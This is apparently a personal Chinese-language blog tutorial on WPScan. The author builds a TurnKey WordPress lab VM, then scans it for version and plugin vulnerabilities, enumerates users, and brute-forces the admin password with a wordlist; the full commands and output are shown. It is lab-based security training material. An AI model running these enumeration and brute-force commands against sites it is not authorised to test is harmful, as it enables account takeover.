WPScan掃描Wordpress漏洞
一、什麽是Wpscan?什麽是Wordpres?
1.Wpscan
WPScan是一個掃描WordPress漏洞的黑盒子掃描器,可以掃描出wordpress的版本,主題,插件,後臺用戶以及爆破後臺用戶密碼等。
2.Wordpress
WordPress是一種使用PHP語言和MySQL數據庫開發的博客平臺,用戶可以在支持PHP和MySQL數據庫的服務器上架設屬於自己的網站。也可以把 WordPress當作一個內容管理系統(CMS)來使用。WordPress有許多第三方開發的免費模板,安裝方式簡單易用。
二、Wordpress系統的搭建
1.下載Wordpress
TURNKEYLINUX是linux一站式軟件站,在瀏覽器地址欄輸入 https://www.turnkeylinux.org/ 訪問官網下載Wordpress
2.Wordpress的安裝配置
詳細安裝配置教程
https://www.cnblogs.com/WangYiqiang/p/9560325.html
註意:在虛擬機中安裝Wordpress前需配置好虛擬機網絡等設置
Wordpress配置好後如圖所示
該界面顯示了Wordpress應用服務的詳細信息,如Web地址,Webshell地址,Webmin地址,PHPMyAdmin的地址和端口號以及SSH/SFTP地址和端口號。
出現此界面表明WordPress Turnkey Linux 搭建完成,可以使用。
三、使用Wpscsn對WordPress進行漏洞掃描
1.利用 “wpscan -h”命令,可查看Wpscan的版本,常用選項,功能介紹,例程等;
1 root@kali:~# wpscan -h
2 _______________________________________________________________
3 __ _______ _____
4 \ \ / / __ \ / ____|
5 \ \ /\ / /| |__) | (___ ___ __ _ _ __
6 \ \/ \/ / | ___/ \___ \ / __|/ _` | ‘_ \
7 \ /\ / | | ____) | (__| (_| | | | |
8 \/ \/ |_| |_____/ \___|\__,_|_| |_|
9
10 WordPress Security Scanner by the WPScan Team
11 Version 2.9.1 //Wpscan版本信息
12 Sponsored by Sucuri - https://sucuri.net
13 @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
14 _______________________________________________________________
15
16 Help :
17
18 Some values are settable in a config file, see the example.conf.json
19
20 --update Update the database to the latest version.
#更新命令 命令“ root@kali:~# wpscan --update”
21 --url | -u <target url> The WordPress URL/domain to scan.
#指定URL/域進行掃描 命令“root@kali:~# wpscan --url 地址”或“root@kali:~# wpscan -u 地址”
22 --force | -f Forces WPScan to not check if the remote site is running WordPress.
#強制Wpscan不檢查遠程正在運行WordPress的主機
23 --enumerate | -
24 option :
25 u usernames from id 1 to 10
#默認用戶1-用戶10
26 u[10-20] usernames from id 10 to 20 (you must write [] chars)
#默認用戶10-20([]中字符必須寫)
27 p plugins
#插件程序
28 vp only vulnerable plugins
#僅漏洞插件程序
29 ap all plugins (can take a long time)
#所有插件程序(耗時比較長)
30 tt timthumbs
#小號
31 t themes#主題
32 vt only vulnerable themes
#僅漏洞主題
33 at all themes (can take a long time)
#所有主題
34 Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugi
#多值參數
35 If no option is supplied, the default is "vt,tt,u,vp" 無參默認 37 --exclude-content-based "<regexp or string>" 38 Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied. 39 You do not need to provide the regexp delimiters, but you must write the quotes (simple or double). 40 --config-file | -c <config file> Use the specified config file, see the example.conf.json.
配置文佳 41 --user-agent | -a <User-Agent> Use the specified User-Agent.
指定用戶代理 42 --cookie <String> String to read cookies from.
cookie字符串讀取 43 --random-agent | -r Use a random User-Agent.
代理 44 --follow-redirection If the target url has a redirection, it will be followed without asking if you wanted to do so or not
跟蹤重定向目標網址 45 --batch Never ask for user input, use the default behaviour.
不請求用戶輸入使用默認 46 --no-color Do not use colors in the output.
不在輸出中使用顏色 47 --wp-content-dir <wp content dir> WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it. 48 Subdirectories are allowed. WPScan嘗試通過掃描索引頁面來查找內容目錄(即wp-content),但是您可以指定它。允許使用子目錄。
49 --wp-plugins-dir <wp plugins dir> Same thing than --wp-content-dir but for the plugins directory. 50 If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed ame比--wp-content-dir但是對於plugins目錄。 如果沒有提供,WPScan將使用wp-content-dir / plugins。 允許子目錄
51 --proxy <[protocol://]host:port> Supply a proxy. HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported. 52 If no protocol is given (format host:port), HTTP will be used.
53 --proxy-auth <username:password> Supply the proxy login credentials. 提供代理登陸憑證
54 --basic-auth <username:password> Set the HTTP Basic authentication.
設置HTTP基本認證
55 --wordlist | -w <wordlist> Supply a wordlist for the password brute forcer.
為暴力密碼破解指定密碼字典
56 --username | -U <username> Only brute force the supplied username.
指定暴力破解用戶 57 --usernames <path-to-file> Only brute force the usernames from the file. 僅從密碼字典中暴力破解用戶名
58 --threads | -t <number of threads> The number of threads to use when multi-threading requests.
多線程指定線程數
59 --cache-ttl <cache-ttl> Typhoeus cache TTL. 60 --request-timeout <request-timeout> Request Timeout. 請求時間間隔
61 --connect-timeout <connect-timeout> Connect Timeout. 連接時間間隔
62 --max-threads <max-threads> Maximum Threads. 最大線程數
63 --throttle <milliseconds> Milliseconds to wait before doing another web request. If used, the --threads should be set to 1.
在執行另一個Web請求之前等待的毫秒數。 如果使用,則--threads應設置為1。 64 --help | -h This help screen. 65 --verbose | -v Verbose output. 66 --version Output the current version and exit. 67 68 69 Examples : 70 幫助 71 -Further help ... 72 ruby ./wpscan.rb --help
73 做“非侵入性”檢查 74 -Do ‘non-intrusive‘ checks ... 75 ruby ./wpscan.rb --url www.example.com
76 使用50個線程對枚舉的用戶做單詞列表密碼蠻力… 77 -Do wordlist password brute force on enumerated users using 50 threads ... 78 ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50
79 做單詞表密碼蠻力上的“管理員”用戶名只… 80 -Do wordlist password brute force on the ‘admin‘ username only ... 81 ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin
82 枚舉安裝的插件… 83 -Enumerate installed plugins ... 84 ruby ./wpscan.rb --url www.example.com --enumerate p
85 枚舉安裝的主題 86 -Enumerate installed themes ... 87 ruby ./wpscan.rb --url www.example.com --enumerate t
88 枚舉用戶 89 -Enumerate users ... 90 ruby ./wpscan.rb --url www.example.com --enumerate u
91 枚舉安裝的TimTrBBS 92 -Enumerate installed timthumbs ... 93 ruby ./wpscan.rb --url www.example.com --enumerate tt
94 使用HTTP代理 95 -Use a HTTP proxy ... 96 ruby ./wpscan.rb --url www.example.com --proxy 127.0.0.1:8118
97 使用SoCKS5代理 98 -Use a SOCKS5 proxy ... (cURL >= v7.21.7 needed) 99 ruby ./wpscan.rb --url www.example.com --proxy socks5://127.0.0.1:9000
100 使用自定義內容目錄 101 -Use custom content directory ... 102 ruby ./wpscan.rb -u www.example.com --wp-content-dir custom-content
103 使用自定義插件目錄 104 -Use custom plugins directory ... 105 ruby ./wpscan.rb -u www.example.com --wp-plugins-dir wp-content/custom-plugins 106 更新數據庫 107 -Update the DB ... 108 ruby ./wpscan.rb --update 109 調試輸出 110 -Debug output ... 111 ruby ./wpscan.rb --url www.example.com --debug-output 2>debug.log 112 113 See README for further information.
2.對配置好的靶機進行掃描
wpscan -u 192.168.64.138 /wpscan --url 192.168.64.138
命令詳解:對目標地址進行掃描
1 root@kali:~# wpscan -u 192.168.64.138
2 _______________________________________________________________
3 __ _______ _____
4 \ \ / / __ \ / ____|
5 \ \ /\ / /| |__) | (___ ___ __ _ _ __
6 \ \/ \/ / | ___/ \___ \ / __|/ _` | ‘_ \
7 \ /\ / | | ____) | (__| (_| | | | |
8 \/ \/ |_| |_____/ \___|\__,_|_| |_|
9
10 WordPress Security Scanner by the WPScan Team
11 Version 2.9.1
12 Sponsored by Sucuri - https://sucuri.net
13 @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
14 _______________________________________________________________
15
16 [+] URL: http://192.168.64.138/
17 [+] Started: Fri Aug 17 23:20:05 2018
18
19 [!] The WordPress ‘http://192.168.64.138/readme.html‘ file exists exposing a version number
20 [+] Interesting header: LINK: <http://192.168.64.138/index.php/wp-json/>; rel="https://api.w.org/"
21 [+] Interesting header: SERVER: Apache
22 [+] XML-RPC Interface available under: http://192.168.64.138/xmlrpc.php
23
24 [+] WordPress version 4.7.4 identified from advanced fingerprinting (Released on 2017-04-20)
25 [!] 25 vulnerabilities identified from the version number
26
27 [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
28 Reference: https://wpvulndb.com/vulnerabilities/8807
29 Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
30 Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
31 Reference: https://core.trac.wordpress.org/ticket/25239
32 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
33
34 [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
35 Reference: https://wpvulndb.com/vulnerabilities/8815
36 Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
37 Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
38 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
39 [i] Fixed in: 4.7.5
40
41 [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
42 Reference: https://wpvulndb.com/vulnerabilities/8816
43 Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
44 Reference: https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
45 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
46 [i] Fixed in: 4.7.5
47
對具有漏洞的腳本進行掃描····
286
287 [+] Finished: Fri Aug 17 23:20:10 2018
288 [+] Requests Done: 50
289 [+] Memory used: 50.062 MB 使用內存
290 [+] Elapsed time: 00:00:04 耗時
3.通過漏洞插件掃描用戶
wpscan -u 192.168.64.138 -e u vp
命令詳解 -e使用枚舉方式 u 掃描ID1-ID10 vp掃描漏洞插件
1 root@kali:~# wpscan -u 192.168.64.138 -e u vp
2 _______________________________________________________________
3 __ _______ _____
4 \ \ / / __ \ / ____|
5 \ \ /\ / /| |__) | (___ ___ __ _ _ __
6 \ \/ \/ / | ___/ \___ \ / __|/ _` | ‘_ \
7 \ /\ / | | ____) | (__| (_| | | | |
8 \/ \/ |_| |_____/ \___|\__,_|_| |_|
9
10 WordPress Security Scanner by the WPScan Team
11 Version 2.9.1
12 Sponsored by Sucuri - https://sucuri.net
13 @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
14 _______________________________________________________________
15
16 [+] URL: http://192.168.64.138/
17 [+] Started: Fri Aug 17 23:30:12 2018
18
19 [!] The WordPress ‘http://192.168.64.138/readme.html‘ file exists exposing a version number
20 [+] Interesting header: LINK: <http://192.168.64.138/index.php/wp-json/>; rel="https://api.w.org/"
21 [+] Interesting header: SERVER: Apache
22 [+] XML-RPC Interface available under: http://192.168.64.138/xmlrpc.php
23
24 [+] WordPress version 4.7.4 identified from advanced fingerprinting (Released on 2017-04-20)
25 [!] 25 vulnerabilities identified from the version number
26
27 [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
28 Reference: https://wpvulndb.com/vulnerabilities/8807
29 Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
30 Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
31 Reference: https://core.trac.wordpress.org/ticket/25239
32 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
33
34 [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
35 Reference: https://wpvulndb.com/vulnerabilities/8815
36 Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
37 Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
38 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
39 [i] Fixed in: 4.7.5
40
41 [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
42 Reference: https://wpvulndb.com/vulnerabilities/8816
43 Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
44 Reference: https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
45 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
46 [i] Fixed in: 4.7.5
47
286
287 [+] Enumerating usernames ...
288 [+] Identified the following 1 user/s:
289 +----+-------+-----------------+
290 | Id | Login | Name |
291 +----+-------+-----------------+
292 | 1 | admin | admin – TurnKey |
293 +----+-------+-----------------+
294 [!] Default first WordPress username ‘admin‘ is still used
295
296 [+] Finished: Fri Aug 17 23:30:17 2018
297 [+] Requests Done: 64
298 [+] Memory used: 52.52 MB
299 [+] Elapsed time: 00:00:04
3.使用密碼字典對用戶進行爆破
wpscan -u 192.168.64.138 -e u --wordlist /root/wordlist.txt
命令詳解: -e枚舉方式 u 用戶ID1-ID10 --wordlist使用指定字典進行密碼爆破 /root/wordlist.txt 字典路徑及字典文件 wordlist.txt字典文件需自己準備或使用kali自帶字典
1 root@kali:~# wpscan -u 192.168.64.138 -e u --wordlist /root/wordlist.txt
2 _______________________________________________________________
3 __ _______ _____
4 \ \ / / __ \ / ____|
5 \ \ /\ / /| |__) | (___ ___ __ _ _ __
6 \ \/ \/ / | ___/ \___ \ / __|/ _` | ‘_ \
7 \ /\ / | | ____) | (__| (_| | | | |
8 \/ \/ |_| |_____/ \___|\__,_|_| |_|
9
10 WordPress Security Scanner by the WPScan Team
11 Version 2.9.1
12 Sponsored by Sucuri - https://sucuri.net
13 @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
14 _______________________________________________________________
15
16 [+] URL: http://192.168.64.138/
17 [+] Started: Fri Aug 17 23:37:59 2018
18
19 [!] The WordPress ‘http://192.168.64.138/readme.html‘ file exists exposing a version number
20 [+] Interesting header: LINK: <http://192.168.64.138/index.php/wp-json/>; rel="https://api.w.org/"
21 [+] Interesting header: SERVER: Apache
22 [+] XML-RPC Interface available under: http://192.168.64.138/xmlrpc.php
23
24 [+] WordPress version 4.7.4 identified from advanced fingerprinting (Released on 2017-04-20)
25 [!] 25 vulnerabilities identified from the version number
26
27 [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
28 Reference: https://wpvulndb.com/vulnerabilities/8807
29 Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
30 Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
31 Reference: https://core.trac.wordpress.org/ticket/25239
32 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
33
34 [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
35 Reference: https://wpvulndb.com/vulnerabilities/8815
36 Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
37 Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
38 Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
39 [i] Fixed in: 4.7.5
282 [!] Title: WP Super Cache <= 1.4.4 - PHP Object Injection
283 Reference: https://wpvulndb.com/vulnerabilities/8198
284 Reference: http://z9.io/2015/09/25/wp-super-cache-1-4-5/
285 [i] Fixed in: 1.4.5
286
287 [+] Enumerating usernames ...
288 [+] Identified the following 1 user/s:
289 +----+-------+-----------------+
290 | Id | Login | Name |
291 +----+-------+-----------------+
292 | 1 | admin | admin – TurnKey |
293 +----+-------+-----------------+
294 [!] Default first WordPress username ‘admin‘ is still used
295 [+] Starting the password brute forcer
296 [+] [SUCCESS] Login : admin Password : Root********
297
298 Brute Forcing ‘admin‘ Time: 00:00:00 <===== > (2 / 3) 66.66% ETA: 00:00:00
299 +----+-------+-----------------+------------------+
300 | Id | Login | Name | Password |
301 +----+-------+-----------------+------------------+
302 | 1 | admin | admin – TurnKey | Root********* |
303 +----+-------+-----------------+------------------+
304
305 [+] Finished: Fri Aug 17 23:38:06 2018
306 [+] Requests Done: 72
307 [+] Memory used: 53.016 MB
308 [+] Elapsed time: 00:00:06
4.其他常用命令
wpscan -u 192.168.64.138 -e u --wordlist /root/wordlist.txt -t 50
-e枚舉方式 u 用戶ID1-ID10 --wordlist使用指定字典進行密碼爆破 /root/wordlist.txt 字典路徑及字典文件 wordlist.txt字典文件需自己準備或使用kali自帶字典 -t 指定50個線程數
此文為本人學習實踐後所寫,轉載請註明出處
如果喜歡本文請點擊【推薦】
WPScan掃描Wordpress漏洞